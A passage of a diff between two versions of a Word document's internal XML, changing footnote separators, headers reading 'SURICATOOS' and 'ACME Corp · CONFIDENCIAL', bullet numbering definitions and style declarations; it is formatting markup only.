xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="FootnoteReference"/>
-        </w:rPr>
-        <w:footnoteRef/>
-      </w:r>
       <w:r>
         <w:separator/>
       </w:r>
@@ -6399,15 +6868,6 @@
   </w:footnote>
   <w:footnote w:type="continuationSeparator" w:id="0">
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="FootnoteReference"/>
-        </w:rPr>
-        <w:footnoteRef/>
-      </w:r>
       <w:r>
         <w:continuationSeparator/>
       </w:r>
@@ -6417,11 +6877,11 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:pBdr>
-        <w:bottom w:val="single" w:color="E2E8F0" w:sz="6" w:space="2"/>
+        <w:bottom w:val="single" w:sz="6" w:space="2" w:color="E2E8F0"/>
       </w:pBdr>
       <w:tabs>
         <w:tab w:val="right" w:pos="9360"/>
@@ -6435,7 +6895,7 @@
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t xml:space="preserve">SURICATOOS</w:t>
+      <w:t>SURICATOOS</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -6443,23 +6903,26 @@
         <w:sz w:val="14"/>
         <w:szCs w:val="14"/>
       </w:rPr>
-      <w:t xml:space="preserve">	ACME Corp · CONFIDENCIAL</w:t>
+      <w:tab/>
+      <w:t>ACME Corp · CONFIDENCIAL</w:t>
     </w:r>
   </w:p>
 </w:hdr>
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p/>
 </w:hdr>
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50811A26"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:lvl w:ilvl="0" w15:tentative="1">
+    <w:tmpl w:val="A06A9290"/>
+    <w:lvl w:ilvl="0" w:tplc="1EAE658E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -6468,7 +6931,7 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w15:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="81A04992">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="○"/>
@@ -6477,7 +6940,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="2" w15:tentative="1">
+    <w:lvl w:ilvl="2" w:tplc="DC82E65C">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="■"/>
@@ -6486,7 +6949,7 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="3" w15:tentative="1">
+    <w:lvl w:ilvl="3" w:tplc="D9D0A366">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -6495,7 +6958,7 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="4" w15:tentative="1">
+    <w:lvl w:ilvl="4" w:tplc="0876D550">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="○"/>
@@ -6504,7 +6967,7 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="5" w15:tentative="1">
+    <w:lvl w:ilvl="5" w:tplc="F8FEECCC">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="■"/>
@@ -6513,7 +6976,7 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="6" w15:tentative="1">
+    <w:lvl w:ilvl="6" w:tplc="07A80BC4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -6522,7 +6985,7 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="7" w15:tentative="1">
+    <w:lvl w:ilvl="7" w:tplc="D39CC322">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -6531,7 +6994,7 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="8" w15:tentative="1">
+    <w:lvl w:ilvl="8" w:tplc="AB88F838">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="●"/>
@@ -6541,8 +7004,8 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="1" w16cid:durableId="1375274145">
+    <w:abstractNumId w:val="0"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -6551,30 +7014,405 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
+        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:lang w:val="en-BR" w:eastAsia="en-US" w:bidi="ar-SA"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
-  <w:style w:type="paragraph" w:styleId="Title">
-    <w:name w:val="Title"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
+    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
